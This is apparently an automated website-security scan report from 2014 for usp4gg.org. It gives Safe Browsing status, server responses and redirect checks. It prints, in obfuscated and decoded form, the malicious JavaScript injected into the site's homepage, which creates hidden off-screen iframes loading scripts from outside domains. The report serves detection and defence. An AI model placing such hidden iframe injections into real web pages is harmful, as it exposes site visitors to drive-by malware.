Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usp4gg.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.usp4gg.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Jun 2014 05:10:15 GMT Location: http://usp4gg.org/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://usp4gg.org/xmlrpc.php | clean |
http://usp4gg.org/ | 200 OK Content-Length: 47279 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://xpertizein.com/script.php');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f); Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://unwowpu.eu/count3.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://unwowpu.eu/count3.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... Antivirus reports:
| ||
http://usp4gg.org/protest-venue | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://usp4gg.org/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usp4gg.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:10:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://usp4gg.org/xmlrpc.php
GET / HTTP/1.1
Host: usp4gg.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:10:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://usp4gg.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: usp4gg.org
Referer: http://www.google.com/search?q=usp4gg.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: usp4gg.org
Referer: http://www.google.com/search?q=usp4gg.org
Result:
The result is similar to the first query. There are no suspicious redirects found.